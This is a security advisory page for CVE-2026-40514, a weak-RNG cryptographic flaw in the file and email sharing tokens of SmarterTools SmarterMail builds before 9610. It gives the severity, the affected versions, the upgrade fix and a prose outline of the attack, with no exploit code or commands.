CVE-2026-40514: SmarterTools SmarterMail < Build 9610 Cryptographic Weakness via Weak RNG

Q: What is the severity of CVE-2026-40514?

CVE-2026-40514 is considered a high severity vulnerability due to its potential impact on cryptographic strength.

Q: How do I fix CVE-2026-40514?

To fix CVE-2026-40514, upgrade SmarterTools SmarterMail to version 9610 or later.

Q: What specific weakness does CVE-2026-40514 introduce?

CVE-2026-40514 introduces a cryptographic weakness by using DES-CBC encryption with predictable keys derived from a weak random number generator.

Q: Which versions of SmarterMail are affected by CVE-2026-40514?

CVE-2026-40514 affects all versions of SmarterTools SmarterMail prior to build 9610.

Q: What are the potential impacts of exploiting CVE-2026-40514?

Exploiting CVE-2026-40514 could lead to unauthorized access to sensitive file and email contents due to weak encryption.

Published Apr 27, 2026

Updated

SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.

Affected Software

1 affected component

SmarterTools SmarterMail<9610

Event History

Apr 27, 2026

CVE Published

via MITRE·02:21 PM

Data Sourced

via MITRE·02:21 PM

DescriptionSeverityWeakness

Data Sourced

via NVD·03:16 PM

DescriptionSeverityWeakness

Frequently Asked Questions

What is the severity of CVE-2026-40514?

CVE-2026-40514 is considered a high severity vulnerability due to its potential impact on cryptographic strength.

How do I fix CVE-2026-40514?

To fix CVE-2026-40514, upgrade SmarterTools SmarterMail to version 9610 or later.

What specific weakness does CVE-2026-40514 introduce?

CVE-2026-40514 introduces a cryptographic weakness by using DES-CBC encryption with predictable keys derived from a weak random number generator.

Which versions of SmarterMail are affected by CVE-2026-40514?

CVE-2026-40514 affects all versions of SmarterTools SmarterMail prior to build 9610.

What are the potential impacts of exploiting CVE-2026-40514?

Exploiting CVE-2026-40514 could lead to unauthorized access to sensitive file and email contents due to weak encryption.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co

By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.

CVE-2026-40514 - SmarterTools SmarterMail < Build 9610 Cryptographic Weakness via Weak RNG - SecAlerts